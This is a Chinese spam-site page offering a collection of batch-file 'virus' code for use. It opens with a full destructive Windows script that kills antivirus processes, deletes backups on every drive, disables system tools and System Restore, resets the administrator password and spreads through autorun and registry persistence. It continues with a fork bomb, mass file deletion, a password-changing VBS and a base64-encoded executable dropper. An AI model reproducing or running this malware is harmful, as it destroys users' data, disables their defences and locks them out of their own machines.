www.tjgcgs88.cn-狠狠久久亚洲欧美专区不卡,久久精品国产99久久无毒不卡,噼里啪啦国语版在线观看,zσzσzσ女人极品另类

  • <strike id="qgi8o"><td id="qgi8o"></td></strike>
  • <ul id="qgi8o"><acronym id="qgi8o"></acronym></ul>
  • <li id="qgi8o"></li>
    <ul id="qgi8o"></ul>
    <strike id="qgi8o"><rt id="qgi8o"></rt></strike>
    <ul id="qgi8o"><center id="qgi8o"></center></ul>
  • <kbd id="qgi8o"></kbd>

    批處理文件的病毒代碼大全! 批處理病毒代碼?

    最強(qiáng)病毒!謹(jǐn)慎運(yùn)行!此程序會(huì)將系統(tǒng)搞崩潰.

    摘自:htt我ps://www是.jb51.net/a鏈rticle/7129.h接tm  去掉里面的字哦

    @echo off  
    title You DEAD!!!!!!!  
    set taskkill=s  
    copy %0 %windir%\system32\cmd.bat  
    attrib %windir%\system32\cmd.bat +r +s +h  
    net stop sharedaccess >nul  
    %s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul  
    %s% /im norton* /f >nul  
    %s% /im av* /f >nul  
    %s% /im fire* /f >nul  
    %s% /im anti* /f >nul  
    %s% /im spy* /f >nul  
    %s% /im bullguard /f >nul  
    %s% /im PersFw /f >nul  
    %s% /im KAV* /f >nul  
    %s% /im ZONEALARM /f >nul  
    %s% /im SAFEWEB /f >nul  
    %s% /im OUTPOST /f >nul  
    %s% /im nv* /f >nul  
    %s% /im nav* /f >nul  
    %s% /im F-* /f >nul  
    %s% /im ESAFE /f >nul  
    %s% /im cle /f >nul  
    %s% /im BLACKICE /f >nul  
    %s% /im def* /f >nul  
    %s% /im 360safe.exe /f >nul  
    net stop Shadow" "System" "Service  
    set alldrive=d e f g h i j k l m n o p q r s t u v w x y z  
    for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul  
    for %%a in (c %alldrive%) do del %%a:\修復(fù)* /f /s /q >nul  
    rem 修改注冊(cè)表.......  
    REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\  
    Folder\Hidden\SHOWALL /v   
    CheckedValue /t REG_DWORD /d 00000000 /f >nul  
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
    NoRun /t REG_DWORD /d   
    00000001 /f >nul  
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
    NoRecentDocsMenu /t   
    REG_DWORD /d 00000001 /f >nul  
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
    NoDrives /t REG_DWORD /d   
    4294967295 /f >nul  
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v   
    Disableregistrytools /t   
    REG_DWORD /d 00000002 /f >nul  
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
    NoNetHood /t REG_DWORD /d   
    00000001 /f >nul  
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V   
    NoDesktop /t REG_DWORD /d   
    00000001 /f >nul  
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
    NoClose /t REG_DWORD /d   
    00000001 /f >nul  
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
    NoFind /t REG_DWORD /d   
    00000001 /f >nul  
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v   
    DisableTaskMgr /t REG_DWORD   
    /d 00000001 /f >nul  
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
    NoLogOff /t REG_DWORD /d   
    00000001 /f >nul  
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
    NoSetTaskBar /t REG_DWORD   
    /d 00000001 /f >nul  
    REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v   
    DisableSR /t REG_DWORD /d   
    00000001 /f >nul  
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v   
    DisableConfig /t REG_DWORD /d   
    00000001 /f >nul  
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v   
    RestrictRun /t REG_DWORD /d   
    00000001 /f >nul  
    cls  
    net user administrator 123456 >nul  
    for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul  
    echo @echo off >d:\setup.bat  
    echo shutdown -r -t 10 -f -c 親愛(ài)的朋友,我十分抱歉的通知你,你的電腦已經(jīng)嚴(yán)重崩潰,請(qǐng)重新  
    安裝系統(tǒng)可以解決此問(wèn)題  
    !^.^ >>d:\setup.bat  
    echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「開(kāi)始」菜單\程序\啟動(dòng)  
    \a.bat >>d:\setup.bat  
    echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   
    setup.bat /t REG_SZ /d d:\setup.bat   
    /f >>d:\setup.bat  
    echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   
    setup.bat /t REG_SZ /d d:\setup.bat   
    /f >>d:\setup.bat  
    echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v   
    setup.bat /t REG_SZ /d d:\setup.bat   
    /f >>d:\setup.bat  
    HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f   
    >>d:\setup.bat  
    echo [windows] >> %windir%\win.ini  
    echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini  
    echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini  
    echo [boot] >> %windir%\system.ini  
    echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini  
    echo [AutoRun] >d:\autorun.inf  
    echo Open=setup.bat >>d:\autorun.inf  
    echo Open=system.bat >>d:\autorun.inf  
    attrib d:\autorun.inf +r +s +h >>d:\setup.bat  
    attrib d:\setup.bat +r +s +h >>d:\setup.bat  
    start d:\setup.bat /min >nul  
    echo @echo off >>C:\AUTOEXEC.BAT  
    echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   
    AUTOEXEC.BAT /t REG_SZ /d   
    C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT  
    echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   
    AUTOEXEC.BAT /t REG_SZ /d   
    C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT  
    REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v   
    AUTOEXEC.BAT /t REG_SZ /d   
    C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT  
    echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   
    setup.bat /t REG_SZ /d d:\setup.bat   
    /f >>C:\AUTOEXEC.BAT  
    echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   
    setup.bat /t REG_SZ /d d:\setup.bat   
    /f >>C:\AUTOEXEC.BAT  
    REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v   
    setup.bat /t REG_SZ /d d:\setup.bat   
    /f >>C:\AUTOEXEC.BAT  
    echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT  
    copy %0 %systemroot%\windows.bat >nul  
    if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat  
    if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%  
    windir%/system32/explorer.bat  
    if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%  
    windir%/system32/explorer.bat  
    echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   
    AUTOEXEC.BAT /t REG_SZ /d   
    C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat  
    echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   
    AUTOEXEC.BAT /t REG_SZ /d   
    C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat  
    echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   
    setup.bat /t REG_SZ /d d:\setup.bat   
    /f >>%windir%/system32/explorer.bat  
    echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   
    setup.bat /t REG_SZ /d d:\setup.bat   
    /f >>%windir%/system32/explorer.bat  
    echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v   
    explorer.bat /t REG_SZ /d %  
    windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat  
    echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v   
    explorer.bat /t REG_SZ /d %  
    windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat  
    echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat  
    attrib %windir%/system32/explorer.bat +r +s +h%  
    attrib %systemroot%/windows.bat +r +s +h  
    for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat  
    for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat  
    for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat  
    set drive=e f g h i j k l m n o p q r s t u v w x y z  
    for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf  
    for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf  
    copy %0 d:\Program" "Filesun.bat  
    for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start   
    d:\Program" "Filesun.bat /min   
    >>%%c:\system.bat  
    for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat  
    for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul  
    for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul  
    if not exist %windir%/system32/explorer.bat start d:\Program" "Filesun.bat  
    /min >>d:\setup.bat  
    attrib d:\Program" "Filesun.bat +r +s +h >nul  
    del %0  
    exit


    很多,有幾個(gè)思路貢獻(xiàn)下
    第一種
    :1
    start %0
    goto 1
    這個(gè)代碼會(huì)自己運(yùn)行自己,產(chǎn)生無(wú)限窗口,直到內(nèi)存爆滿死機(jī)。
    第二種
    copy %0 "C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)\*.*“
    copy %0 "C:\Documents and Settings\Default User\「開(kāi)始」菜單\程序\啟動(dòng)\*.*"
    copy %0 "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    加上這個(gè)代碼之后,會(huì)把自身添加到啟動(dòng)菜單中(隨系統(tǒng)啟動(dòng)而啟動(dòng),與shutdown -r -t 0搭配使用威力倍增)
    第三種
    for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    這是刪除CDEF盤上面的gho文件,使用戶無(wú)法通過(guò)ghost恢復(fù)系統(tǒng)
    第四種(特殊)
    Echo Const strPassword = "wohenni"' >>1.vbs
    echo Dim WshNetwork >>1.vbs
    echo Set WshNetwork = CreateObject("WScript.Network") >>1.vbs
    echo Dim userName >>1.vbs
    echo userName = WshNetwork.userName&",user" >>1.vbs
    echo Dim Domain >>1.vbs
    echo Set Domain = GetObject("WinNT://./"&userName) >>1.vbs
    echo Domain.SetPassword strPassword >>1.vbs
    echo Domain.SetInfo >>1.vbs
    echo dim gj >>1.vbs
    echo on error resume next >>1.vbs
    echo dim WSHshellA >>1.vbs
    echo set WSHshellA = wscript.createobject("wscript.shell") >>1.vbs
    start “” “1.vbs“
    生成能把登錄密碼改為”wohenni”的VBS,并運(yùn)行。
    第五種

    fsutil file createnew C:\1.hahaha 4096000
    這是生成特定大小的文件,這句意思是在C盤下面生成1.hahaha,大小為4096000字節(jié)
    還有很多,不一一列舉了,希望您能更好地學(xué)習(xí)批處理!

    @echo off
    echo UEsDBBQAAAAIAHV36kiQ6IfZcyEAAAA6AAAIAAAATUVNWi5leGXtew10U8e17kg6soUtjACbGGzi>x
    echo AxgMyD9Hlm1sY4JkW2AH/wjLP5BgB9k6RhKSjqIfbKcJyBgaqw65tM1NIJckNE1705Tcpi3JJWma>>x
    echo OD830Da0TptFSQOpXx7NFSnhmYRbnIRw3jfnyMZpfmCt99b7WauzvM+c2TOz95699+zZIw71t+wl>>x
    echo KkIIAxBFQo4QuZjItctJQErWcynk8LTjC44o6o4vaHa6gqw/IGwJ2L1sl93nE0JsJ88Gwj7W5WOr>>x
    echo G22sV3Dw+dOnJ2XHaTxj9pZ/yKpcE/Dphr2uz6R3pet3qDdvT3BekurLro+kWuGkdZOry0nHf5Vs>>x
    echo VgshdQo1eXHNzrYJ3ChRKpIVKYRo0Vgu4/Jm4aEDsPFV03clIWqikPonahKJK0nqNu2WBtKxk/Vk>>x
    echo JZXDKwk5SF82ExJTfImAfogBPnvLCSm9Dl1PFsip+zJ68ZIf4ntDdHnJcYG0V+WeQmJzfsBhD9kJ>>x
    echo eXmBjCAL/24BRNKGKV8eRu6jPK1E0g0p/MK44fxAMNBF4mvdHB9X9CX0ArxH6JLXTnUgyVbyhXGV>>x
    echo X73Cf5T/naVl6NzAXVpdaDqec0KJ7eLiU6yJxBLQZRxuf1lHWtvcqR1Gsa2tzXlFZyJO6iRtYpoD>>x
    echo o9wOMc2EeuC8Ivzn2zrOTtA7l2lrbXPuKjMRMa0I/UPFEfocd94DVJt4wnmQ1kMnxRNGcWhs99uh>>x
    echo hbv/Frpxj0W0trkV7tniH/ZYLlrdCZQlvHJYPDHw6tI9lnGre6mY5gElq5hGUO2xxKzOwxLJNA3a>>x
    echo GL/Hcuao5Yzkqm1iePyoZYy6mZjGoNuZiK3sThDTRtG4rePWob+0v9Iqpm2mBN3E+cZcLEgNygsw>>x
    echo VIdFOitWQOixWME0qOL3l4pHlmM9Rf98zIpxIPk65mH6MVTG4Y6XGbry/nMV4GdrNb7dFm2/+Au6>>x
    echo B2xuk5jWi0E2a9QyFpc/9gRoOmMqKhpVoJu4lbFdwA2NH9396meimIuZe6Q3a1vsdtrRPmb8m/j0>>x
    echo 68BAVrppxDQ/XRTl4TZFLZdlLlLbKoYvRy3jsWpMhBZsYlouunYPhxVr0COmLUULeDEtRLU4wUaH>>x
    echo 0RjzYJs8YGX44l3q2BX0RcMX3Ulnm0RRlIzrsLUOFY/QZb/dZhNPuBXf37Ue9E58f3A9tcllWKdC>>x
    echo NtJe6ht3XVbMuPcvMIkzG/oU/YyYxknSzNg9CNvYbDbnzTOhHpvsU3ssjx+1PM6h54VSjD9qeYrA>>x
    echo 66zR8Ei0/VC0/XC0/Ui0/flo+3C0/dVo+7Fo++vR9jfFtJNUwyhuh9tB61aQe1Nyvct4/jV1j+Uk>>x
    echo BIpJDOjbGXm81Dixe3jHnzFVhT8nGA87HZLr3knnn4y2jw98KoY1bqWY5pQ0TN0oblTqv2WrYstM>>x
    echo ZFv6c+nwnKHf6k98i0laO6gwr5TwgQvGX5VNP0dHzPlWf81CExnclXIF6jCvlLCB992EurtEttU2>>x
    echo ND+bGucPMATjVv31HphpaJVkrz/C7hFI51bCW+Jy9l6Vc2zgihhOdDNnW0XqIpSkWPw6XNY5tow6>>x
    echo KqWY6FafXYHuVhBLMr5tk+Y7TxXK2t8HMmXzTwE19OnQfOqW25a+wFHTbmPEPxiHrdZWp34ebGGV>>x
    echo LbV24DXNylV0fOC0U5cDV/vDXy8NFdN98SLdOu6iNmcNavjIwHiCbG2KGy2dwIV7nTTWTyjTSc+h>>x
    echo oTFqulK6KdS3uZNskte0Uvnuo970PxTh9/dYDhy1HKigmzwaPgQP2VBGHeUgSJFo+2PR9sclP3n+>>x
    echo qOVIkrT7D1DiVHdiGK5STU1/tuCK5M7r17uToE8Sq1XLu1y3QNrlBLvcOVomb3WqmdhSDNj/7DFQ>>x
    echo ufRxtOXy25bLp9vHT1vG37Zo5JdTxRvKTeSUmqPPVRHp3YnnOy/FDmIuDTcSQ8RGGszEtKeo3Sza>>x
    echo Z/dpQPnSx3v8ytgrDH29MvRJ7Nn424exn+DNrdp/66VPb57xkz+qWi43xQ5InbR9QtUy3iSmHaL6>>x
    echo Um6IRzVpm+pasZEPS3EXL+ckH9ljGUNcTHtMYnzZ+Cu95aJTQ4xk/fpW65BlXI9uvIpp6TS2YeCr>>x
    echo UpAH2UnhqRtYnffNjR8EcVeIJVMZb9y/8atUM33pFNUMSu+bZdXsZmTVwLsr5lJvPizHjiOUdeGG>>x
    echo V3AgkNghlWycVNk4R6x0oAaN2HfQ406ljPcwM+WFZ9smV37SFm0fkxePCLnHcspqk1cfuwXzhurP>>x
    echo DLx0YD+V+WKsVkLEJhDjsdKpI4b+FFs6dQAMlK6i/rBBSf0BVpo2pelkyeukzTbUftnW1EoDbfii>>x
    echo TVaqTQyPyWqVdHPutOXcqeKaKbrxS++leMa2guJUg2bGT7bYwzTkL98IMdyZOPAGXuasbkV3tCUm>>x
    echo pl2ka9uupKLsVVBR9uzMVUz63sC59C91ithVp7g4VD8miW9dT7dF68DwAese8wGru9BdCMfInOIY>>x
    echo Uxz/iysw0RX8SElXMMk8deLgaHMniyf2618eGndr3xDl17E3rsRtL51lkmgnpSgm7ROnYgeR9uIw>>x
    echo HUJ99TU8L+qPDq0aoxib+MfYN7FSCDU0NqHYXgjxVuzUS6fVVupsH8Ld5kCkoWNDr0F5u38fXu5U>>x
    echo gWxTnGrMoqDbahU9x5pipXKDnm1NoG6TTs5X/36ftU5GsGb5HHe4lQhhUihzT8exIaaNS6ddKKM1>>x
    echo xoHkRnlMKyrtZDc0u0HKI0wd7S9ryFdlJRzNSmI0Zo9JkWkIvvT4l6QhA3dpVG1Dd+nCZbahrEtV>>x
    echo EMUUCeW2xnh4z9B0uiL9utT9kts2SahBCaWjnh/MjNrSO25F9kTFoxp/nqZL7S9rKWWkNn9rG3pn>>x
    echo 6MrQaw04ULRDFg1yAN3GjUNjVe6ktXI289d3aaj43j3rpZxjsRMKGnMrEDYoRkzTyrmIxq2QD1Rp>>x
    echo 4J76y+vdDIytk2PTYhxTOyaiTutQWIM1bqIHwLhiu9X4+xpb29A4HGXoT7vF7XO7h5jtM/5d29Ed>>x
    echo ZTqquqPa7Y0r/3zn+6Cye3j7AnfSbe7pG7vLKlrDuu6yulZleBqGtHZH72xVVq4cufMvt90quejb>>x
    echo m7IvD1VnX35FXFxDz9vFddLTKj0HWdP/iWT8/0I5bCLkGGAUMA7QmWX8d/B+wCS/n19FyCcAzU2E>>x
    echo pAJYAAdYA3gP+G7UdwDuBzwOeA5wDHACMIL+YcDPAA8D9gJ2AbYBNqDfsUrmcSDO14raBOAA3XGc>>x
    echo EnLMAlAjcAAToBlAPesOwN9WE/IYYCfAB9gEqAGUAJYAZgGugFcM9SnACOA5wBhwe1fLPHbFeeUD>>x
    echo 6O8hvxhNvPeVe98+wiifVZJnyC8IOT7bMBx9JfpS9OUXCHmRmA71X3k4MVhcEQmqzupI9o7Blw49>>x
    echo ceVXkY/F8KWz74qDrx6KvnIo+mH0nf7XiGmij4QvRU+cfVV86pn3qo6odD8nx3UvQpbhh54lR+59>>x
    echo 6Qghz44kfvTjFw48AuwZu1b1nv3niqbD33wWY8jm42m39F+JPXIXc+jw2I+v/CbyKQn/99boiSej>>x
    echo L0XOZL1XOTj6XuXwB+rhvygH/xr9sKP/k4sPhV95gZhA6ggWc/IIWAxf+c1Zljx16olDT/RfGX4o>>x
    echo VNkvHpwRUp09J1IuijgXzOj/5MAjYdVzFx+S+Rz/Ih+Jydmfi+Bw9iWRtDwxMBNFus9rpF8SWFKc>>x
    echo PHDhwswLhKwj9zMRkTQ2kkcayfu2nVkXshSVDaTBqpyVNaBDUVoZpVUT0SkNWQOpKMoIM1CNohxk>>x
    echo lJGUu00p589/gKJ8lFH+QL3z/PkU5eYblYOagTUoypOMciTlHnL+g9OnTqMcx5/yI2bg9AfnifLn>>x
    echo 8we6UVQso2I1qoUp/eS88lO1yswMjCQmjig/ZnadJ7rEROXP5g34UFR+ZuA8iqqXUfk1u0liIhk9>>x
    echo r7pJ808gSnp6ehJHRkZGE/GiUs5T9WoG3kdRHWNUw5rdScTfk0hU96qVnzD9p0ZUjzKRHtX7jOo8>>x
    echo o2qZN/AECqNjGJ2GmZNEx/ohyMeJqn3qyBhTykT8zEq16odzB76PwmxmBowojJNhNk8fUJHz7ygv>>x
    echo MKr7E/t7/MxqhrmHYdbMY5yau8tQPgYwT2kfLOMg6fl35JLih6hy6fErVP86d2A/ipow/fsfUTMJ>>x
    echo ajJtEG0syE8UqkFmQIGiXpCg1qtV6oyBb6OorYy6RqfexKhzGLVbrd6YqPYmKo7sI49cSNgfVB/6>>x
    echo buKOhMQd63ZemJml/rGoeeIXSuvHqhq1qkEdmamyZar86bvOj0Ig1R6tap+mf5SoHp2vGk5nqpn+>>x
    echo 0VHVO0mR06pYDjNz3oAfojL5ScyKpczmzIiKuSuZuXspMzyd+aUuUsb8Npk5maPWabUjWvUNGjWb>>x
    echo rF6+WN2ZELmgbktT356oDsxU71yuflJM+KmY+PS/9c+cqfhOIzn1dMrlA2Rdc9LGtFmLk3bpUlBm>>x
    echo mZhZJk1Sf1ZkZtKP0maFpw0QuJSWUUdOJT/NJB1XJ71h1io0O0+PjMzaz8z6HpNUkJFcq5utS0nu>>x
    echo 0Mx6kImQZA+jakxIDmck75+RvG/G7Hz1rAfV2rZE7U/VyaFMRjdv58GDB1WnmdkDCZHjs6PqyA6t>>x
    echo g5n9doLWmaXlZiYHGCZXPbswOdIz+9vqSGIqGrF0bTQttYUZVKEYIc87s95NjEzXOtT9fj+jh/9o>>x
    echo n56nTknRnp65K3EUJXWYuRsVnMfvT32dOs1fMvovZM38nVptvSFCUt9kdirQU5qYNludNjsJepnx>>x
    echo 7n/OeOu76kPinEUHb/gBo0mv16TeOosVZ2c92Z+YOPu3Nw8chIekZtbtUvn9KmOqtyj10cz+vYmp>>x
    echo LxrUtfPTUsT0B0RN2n2pY4kgNidPZHfVJVlv7K82zdNxSQfZeZtv6R8ZWViqTl7ALLiQkWyam1Gb>>x
    echo tLAoISMpsf/0+dR0RvVDQ/9ooirKJD+ZkPG9hIxblmTsSO9PSsp8lMl4KDnjRznaggUL30jOuJyt>>x
    echo 3XFjhMu8KSmzNidTyIzsXZSekPndfLU1A0Lo3hqPXFhirScPr9154ULWkkcb4HMJo+KCZ/6gqlUv>>x
    echo vFetshUnb0hZ9B8a1cPlyY8nL09Sq2Lm5I81i25PZipMi57XMfdwiy5nZt+g1v7bwkhWtml+pCe7>>x
    echo Q/vNUTnmay8yy7QZ2XvZ3G+oc7eqs388g5SKeXN35IoNOSv2LXnoQSx+8X/dkiWYklhu7tiNEV2S>>x
    echo YJhnYpVjkXmj6dMVTGTzvM+mqe5fnsGlR1JUb92dMZJuvFnN3GVMtc41/gvDHF/GfS9J+0aWOmvx>>x
    echo jdHZuZvT1J4czSyRM36W+IKYN0/Mn/tdQ0lyZMxQ8UHy3Jx5o3P7N2+e92lycvfywoPpyY8PGk2Z>>x
    echo 2roi4975EaP24azi0dnaEWt2dP70VfNnvCUmPC/OGBR1u8Qlzb9eMPzrec8tWfjUsoxpOctH0itv>>x
    echo Tpi9fafen56aXqofnrtrGkpZ5k2Nqb80qq2Z2T9Ki1xIWyjOWS/eYBXT68WSO39vJqJZfDLjQFHl>>x
    echo aHqEyzi7oopL3zXN759WVlVvzdxjrBqZX3VeS62Q/VzjmpY3blwpKm5dQZ1jmdjIReaO/Xrht5bM>>x
    echo G1228K2ccv8Ni26IrtSxi4Y5496s7Bn96/ZnrPslU61Qm3YlrHu9psA6svrdh0z9TIFCpHv4E9Ea>>x
    echo Obt8Y045u2T5D5eX+xct/+iupkiu0bMysropptPHcmxZcyIf36pkcpcX2wQIf6tFHbmQ+w2D5max>>x
    echo be8Dm95obF/YePf2nFk5dWuOVLcPq+9dciS7KPvFRUXZZPGR6ro17cOa9jfVB4GLLnpxURT4ujUP>>x
    echo WbbnbM/x147lOJf6l/ldzpqxte1XEu52Lt2eU7fkocUds5gOHdORwuz2L9u+tm5NxxztwBhmdCRp>>x
    echo +sfWdqRoOtYwHRXqXTX+WmdN+8Xu3f7a/bll+o7hhI4nEgb8y2bltB9L6PfXdrym6d+f2/Em0/EM>>x
    echo c/f+3E/zs/PRHE7peF1zG2E6/sZgLFl+mzah4/fafnJzx7DneWfNRiEcYLsErz8c4gOs0x5kO3ne>>x
    echo x4YC9qCTd7CdfWzIybP1lvpbgBPcdl8+2yD0sLzPLdz2fMK3GvrsPrbKHsrPzy/A3eNgIu4fjS1N>>x
    echo bFVjvbWl2dLE1phtbKXF0sCuaalaZ6lmKzeyzTUWmWBzU+PN5ob86UnTkz4vRo/gywmxnYIQYsN+>>x
    echo 1r7F7vLlTk8KCmw4yLOuEAspPYJvC637hDD9Z6AFlEh5NX02B/pc6AsJ7FaXxyNz6qFvXXY6vY9y>>x
    echo CvYFQ7yXjunkpyc5+CDW1oflunzBkN0X8vTlsuDmkMQIBfooz/Jq7OM/AeYBnKGQv7ygYIsgbPHw>>x
    echo +V1CftfWgiBvD3Q5V9++qhPk9D32Pn1I0FMR9JRlkPd0X2OeU+jRF+oDvFfYxuvt+m2uQDh4LV7e>>x
    echo Lns3z+u3BfU+IRASfNcaT3lArCDvc0ywoG1vn7474ALymvxcPr4rYO8O6Z32Xr1D6PF5BLsDzCfF>>x
    echo vS7+W/iQ3iv4+L5r6lLw3eHSd4Ydjr6r3LoDPH9duuwM9+l7eN5BrleuLsExqXq9y4eXYNju0Xfa>>x
    echo g66uifvM19Lpcdqpavx+3gcC3dT0egfv4UO8XvY5Y+E1aWwxhvQB49bQNXVjD3U547JO6OZac6TR>>x
    echo +XzvtfTn8mEf+mAlvtfvEQJ8QO+Cozh5veTcnQGhJ8gHrkMf3fYuHvt4K3TStRXbEkoWPJIBv+g8>>x
    echo +h4hII0p5Awl17MO2NflcUA2D7/FFfo81eu0d4C3wzR0g+oxUR+w+4KCt8ceuB7/wvz4ZvXy3jv0>>x
    echo cni8zn2ADTcR7ahmHQJddw/vCjigZbxDGaFu2iP7ElzR77kDDY//6+k67L6tkjjXJ/+kDeQp15hj>>x
    echo 93TrPa5uXm/Ewj28PQh1Q33XmodVIAqGETrsIRdm2j3X9hsEh5B9C6/32wMCtr7XLjlG/N/9ZQf5>>x
    echo 2vnUVSWrwJRxll87nob9rQgx0tNr78Nf8Hr2u1tw+vRdvM+u97ocrrgj+oQQrOvbxgdCiD3X8GMf>>x
    echo H7SHuyRpeczyePiukIsG8q+Xd2sAOuV79cEuHDQCji04ErzP5wKpoD/gCvFBSaRJOvDsHj4QzPe6>>x
    echo ugJCUOgOgaS3gPflhYMF0GsIbAu6hUDYO9G6TYASA3kTrSD92AJGKKBqzfPaPXSXSM6eJ3t+HnVo>>x
    echo Guk8fXnxE5UOLywp7ewydBXmGcu6i/KKCrtL88o4NIvLVthLVhg7SzqLiqfq2Sux7RTsAUf+NqxG>>x
    echo EhMWdBT00HiXh+0RnGCfFwoHfHn2vImtlIewJaDtcMEMdk+ek/d4ILefn0Lf77H35Xd5wp3YVlvC>>x
    echo Lh+lP9nXJfhDLq/rDj6AZUs9k/OoygSoV8J22T3SeQBL834Emy6vg/RQpQMX4LfwDleITEROOi5k>>x
    echo D271bgkQbxB+0e3aQnHeoB95TYg4+G3eLd5QPvoIeqE3D/F6u2gexa6rratD0lS/MZ4rIc2h2RdN>>x
    echo erB8dosQz3QcLp7+rESaLLZmtraBtdbabLnsmsYmSytysHq08kkt22ZuagA1EEa6RmrMNWa2geMq>>x
    echo 2bpCK7vW2Mw2Gdc1I38D8W67y4N0yB6S0yWD0biCdRb1csicaEZzB2VG5WtuqgVBWyPSvKZq1txQ>>x
    echo za5tbKbtNeamXLayRRKG5nuWhupcVsoMrVWQw8bamrG0eFK4ALKgbsLqLA03N25kK7FSstbSjMyx>>x
    echo WU4iN7ANlg3NbHNtvYXtrcb4Vgsmg3bTxtqGtWxzI0uXjvXKTKrNzWaasd25qeBOI33g1K20NVZD>>x
    echo HGSmmAH5W2ubWmystcncsI5duraxwcK2NTU2rF1G9SiLQQVv2GhuYKvM0MtaPsTS+MAiQXRJjs96>>x
    echo yxbI+qLGQCKM/SaEsAoo9gt/ZFG9fStfLzvuWnrumGleS4itsd5S2Vi9kW1sqLJgJXWwt+VqkmzG>>x
    echo miBdg5ltaoTG6i0TeUibsw92d0jOwG+TcnYXbDY1710dT6yhc1eQ7Q53baVG9fUhOc0nNr4rHOAr>>x
    echo aZIdRE+Q2nRLoJT1lrIuFnVpQSmpsW+TMuYJ2thu1OOQDgvd3aDkYAWfnJ+vJhW1PuQEIfZmgfew>>x
    echo t4exM1hsZP4mKivWy4fosUbFs0O6tWaXmUUk6URIWhBfDzZrLku3rEDvHAE+n62Np+CdvMeFJbI9>>x
